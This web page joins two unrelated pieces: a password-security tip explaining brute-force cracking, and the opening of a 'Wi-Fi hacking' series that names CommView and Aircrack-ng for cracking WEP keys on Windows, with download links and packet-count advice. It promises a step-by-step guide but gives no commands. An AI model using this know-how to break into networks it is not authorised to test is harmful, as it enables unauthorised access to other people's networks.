1. Require employees to use strong passwords and change them periodically: Creating a strong computer password is perhaps the easiest thing do to enhance the security of your system. A user needs to set up a complex password, which uses special characters such as “#@!*&” as well as letters and numbers. A strong password should also be between 8-15 characters long. Passwords should never be written down and stored near or under your device. Updating your computer password periodically will help in preventing brute force password cracks. A brute force attack is a trial and error method where an application program attempts to decode a person’s computer password. The brute force application generates a large amount of passwords in order to find the right one and gain access to a target’s computer. The stronger a user’s password is, the harder it is for a hacker to potentially crack it. It is generally a good practice to update your passwords about every 90 days.

WIFI HACKING with PC 001

Many Windows users here are struggling to hack Wi-Fi networks because most of the tutorials are based on Backtrack and other Linux Tools. As you know, there are so many ways to hack or bypass a WIFI PASSWORD but I’m just sharing the method to Crack Wi-Fi networks using WEP security protocol.

TOOLS REQUIRED:

1. Commview for Wi-Fi: 

Commview for Wi-Fi is a powerful wireless network monitor and analyzer for 802.11 a/b/g/n networks. Loaded with many user-friendly features, CommView for Wi-Fi combines performance and flexibility with an ease of use unmatched in the industry. 

CommView for Wi-Fi captures every packet on the air to display important information such as the list of access points and stations, per-node and per-channel statistics, signal strength, a list of packets and network connections, protocol distribution charts, etc. By providing this information, CommView for Wi-Fi can help you view and examine packets, pinpoint network problems, and troubleshoot software and hardware.  
You will use this tool for capturing the packets sent and received through the Access Point you are going to test  .The more packets you capture the better chances of cracking the password .You will need more than 1,00,000 minimum packets to crack the password .The packets will be captured in the .ncp format . You will use this tool to convert the .ncp to .cap. 
NOTE: Some Wi-Fi cards are supported by Commview only in Windows 7 so i suggest you install Windows 7 in your Virtual Machine if your Wi-Fi card isn’t supported. 
Download Link: http://www.tamos.com/download/main/ca.php 

2. Aircrack-Ng GUI: 

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. 
You will use this tool to crack the password of the Access Point using the .cap files you obtained from the Commview application.
 Download Link: http://www.aircrack-ng.org/ 

NOTE:  
1. You need to run this as administrator. 
2. Your Antivirus Might Detect it as a virus. It is a false positive. 

So go on and get the tools and I'll post a step by step guide on how to successfully hack a WIFI with the above mentioned tools... stay connected for more! and drop your comments
 thanks